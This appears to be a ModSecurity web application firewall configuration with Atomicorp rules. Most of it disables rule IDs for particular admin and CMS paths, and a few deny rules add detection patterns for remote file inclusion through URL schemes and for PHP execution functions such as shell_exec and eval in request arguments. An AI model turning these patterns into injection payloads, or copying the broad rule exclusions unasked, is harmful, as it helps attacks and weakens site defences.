SecAction "phase:2,id:91865,t:none,pass,nolog,skipAfter:END_RULES_91865"


SecRule REQUEST_URI|ARGS|!ARGS:/values/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:361129,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}',chain"
SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"

SecRule REQUEST_URI|ARGS|!ARGS:/values/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,id:361130,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"


SecMarker END_RULES_91865

SecRule REQUEST_FILENAME "/apsona_svc\.php" "phase:2,id:91866,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340095"
SecAction "phase:2,id:91867,t:none,pass,nolog,skipAfter:END_RULES_91867"

SecRule ARGS "(?:\(chr ?\( ?[0-9]{1,3} ?\)| ?= ?f(?:open|write) ?\(|(?:passthru|serialize|php_uname|phpinfo|preg_\w+|shell_exec|mysql_query|exec|eval|create_function|base64_decode|decode_base64) ?\()" 	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,capture,id:361131,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  PHP function in Argument - this may be an attack.',logdata:'%{TX.0}'"

SecMarker END_RULES_91867

SecRule REQUEST_FILENAME "/s_listing\.php" "phase:2,id:91868,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/module-inventory/" "phase:2,id:91869,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/items_name_result\.php" "phase:2,id:91870,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/webmail/src/addressbook\.php" "phase:2,id:91871,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/cms-setup/" "phase:2,id:91872,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=390727,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159"

SecRule REQUEST_FILENAME "/s_search\.php" "phase:2,id:91873,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/cpage\.php" "phase:2,id:91874,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=341047,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/display_property\.aspx" "phase:2,id:91875,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/admin-stats\.php" "phase:2,id:91876,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/quickscan/8a\.php" "phase:2,id:91877,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/creatematchstats\.php" "phase:2,id:91878,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/add-process\.php" "phase:2,id:91879,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147"

SecRule REQUEST_FILENAME "/admin/pages/updates\.php" "phase:2,id:91880,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"

SecRule REQUEST_FILENAME "/login_status\.php" "phase:2,id:91881,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91882,t:none,pass,nolog,skipAfter:END_RULES_91882"


SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:next|!ARGS:origin|!ARGS:no_session|!ARGS:no_user|!ARGS:ok_session "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:362129,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}',chain"
SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"

SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:next|!ARGS:origin|!ARGS:no_session|!ARGS:no_user|!ARGS:ok_session "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:362130,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"


SecMarker END_RULES_91882

SecRule REQUEST_FILENAME "/db_search\.php" "phase:2,id:91883,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"

SecRule REQUEST_FILENAME "/gravityforms/preview\.php" "phase:2,id:91884,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91885,t:none,pass,nolog,skipAfter:END_RULES_91885"


SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/input/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:362131,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}',chain"
SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"

SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/input/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:362132,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"


SecMarker END_RULES_91885

SecRule REQUEST_FILENAME "/admin/contmin\.php" "phase:2,id:91886,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/add_static_cgi\.php" "phase:2,id:91887,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"

SecRule REQUEST_FILENAME "/ash/default\.php" "phase:2,id:91888,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/ratesadmin\.php" "phase:2,id:91889,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/testamin\.php" "phase:2,id:91890,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/dartiframe\.html" "phase:2,id:91891,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/jomsocial/profile/edit" "phase:2,id:91892,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/administratie/pro/servers\.php" "phase:2,id:91893,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/admin/payment\.php" "phase:2,id:91894,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/cms/save\.php" "phase:2,id:91895,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=341047,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/pages/update\.php" "phase:2,id:91896,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=341047,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/administrator/options\.php" "phase:2,id:91897,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/modules/catalogs/save_element\.php" "phase:2,id:91898,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=341047,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin_modal/save/" "phase:2,id:91899,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=341047,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/favicon\.php" "phase:2,id:91900,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/admin/components\.php" "phase:2,id:91901,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=341047,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/postbagdo\.php" "phase:2,id:91902,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=341047,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/wp-admin/media\.php" "phase:2,id:91903,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/administrator/index3\.php" "phase:2,id:91904,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340095"

SecRule REQUEST_FILENAME "/portaladmin/edit_annonce1\.php" "phase:2,id:91905,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=347008"

SecRule REQUEST_FILENAME "/portaladmin/add_annonce1\.php" "phase:2,id:91906,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=347008"

SecRule REQUEST_FILENAME "/cms_centralparking\.php" "phase:2,id:91907,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=341047,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/save_lesson\.php" "phase:2,id:91908,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340016"

SecRule REQUEST_FILENAME "/e_brochure_edit\.php" "phase:2,id:91909,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/aboutus-pages_exe\.php" "phase:2,id:91910,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/tbl_alter\.php" "phase:2,id:91911,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=344374,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"

SecRule REQUEST_FILENAME "/newspro\.cgi" "phase:2,id:91912,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/video_edit\.php" "phase:2,id:91913,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/email/test\.php" "phase:2,id:91914,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/groupedit\.php" "phase:2,id:91915,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/retail_oordenkings\.edit\.php" "phase:2,id:91916,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/lesson_edit\.php" "phase:2,id:91917,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/mailtemplate_dhltrack_result\.php" "phase:2,id:91918,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/browse_links\.php" "phase:2,id:91919,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/quote_rads\.php" "phase:2,id:91920,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/tweet-blender/ws\.php" "phase:2,id:91921,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/video_edit\.php" "phase:2,id:91922,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/save\.json" "phase:2,id:91923,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340029"

SecRule REQUEST_FILENAME "/admin/test\.html" "phase:2,id:91924,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/edit\.php" "phase:2,id:91925,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/wp-admin/nav-menus\.php" "phase:2,id:91926,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=390614,ctl:ruleRemovebyID=390707,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/wp-admin/admin-post\.php" "phase:2,id:91927,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=390614,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/admin/portfolio/edit\.php" "phase:2,id:91928,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/wp-content/plugins/pods/ajax/showform\.php" "phase:2,id:91929,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340029"

SecRule REQUEST_FILENAME "/manage/team/create\.php" "phase:2,id:91930,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/sage_download\.php" "phase:2,id:91931,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/template_content_editresult\.php" "phase:2,id:91932,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"

SecRule REQUEST_FILENAME "/adm/index\.php" "phase:2,id:91933,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/e_brochure_email\.php" "phase:2,id:91934,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/addlinks\.php" "phase:2,id:91935,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/adminsettings\.php" "phase:2,id:91936,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

